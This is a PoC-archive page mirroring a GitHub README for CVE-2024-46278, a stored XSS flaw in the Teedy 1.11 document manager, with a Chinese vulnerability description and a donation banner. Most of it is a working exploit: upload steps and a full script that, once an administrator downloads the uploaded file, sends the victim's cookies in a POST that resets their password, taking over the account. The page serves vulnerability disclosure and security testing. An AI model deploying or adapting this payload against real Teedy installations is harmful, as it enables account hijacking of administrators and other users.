Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-46278 PoC — Teedy 安全漏洞

Source
https://github.com/ayato-shitomi/CVE-2024-46278-teedy_1.11_account-takeover
Associated Vulnerability
Title:Teedy 安全漏洞 (CVE-2024-46278)
Description:Teedy是法国Teedy开源的一个面向个人和企业的开源、轻量级文档管理系统。 Teedy 1.11版本存在安全漏洞,该漏洞源于容易通过管理控制台受到跨站脚本(XSS)攻击。
Description
【Teedy 1.11】Account Takeover via XSS
Readme
# 【CVE-2024-46278】teedy_1.11_account-takeover
【Teedy 1.11】account takeover via XSS

# Detail

There is a vulnerability that causes XSS when downloading files. XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks. 

This vulnerability is marked as CVE-2024-46278: https://www.cve.org/CVERecord?id=CVE-2024-46278

# PoC

- Login as an attacker’s account.
- Upload this file as `html` type. You have to change “Origin” and “Referer” and argument for fetch in need.

```javascript
<script>
const currentCookie = document.cookie;

const requestOptions = {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Cookie': currentCookie,
    'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
    'sec-ch-ua-mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
    'sec-ch-ua-platform': '"Linux"',
    'Origin': 'http://localhost:8080',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'http://localhost:8080/',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9'
  },
  body: 'password=superSecure2&passwordconfirm=superSecure2'
};

fetch('http://localhost:8080/api/user', requestOptions)
  .then(response => {
    if (!response.ok) {
      throw new Error('Network response was not ok');
    }
        document.write('<h1>Your account was taken over by the attacker LOL</h1>');
    return response.json();
  })
  .then(data => console.log(data))
  .catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
```

- Login with another account. eg. `admin`
- Click on the file uploaded by the attacker and select `Download this file`.

# Demo

https://www.youtube.com/watch?v=udQgVogsmhA
File Snapshot

 [4.0K]  /data/pocs/7fe89e9ca207c45389a3d4b675235a11515dcaf5
├── [1.2K]  poc.html
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.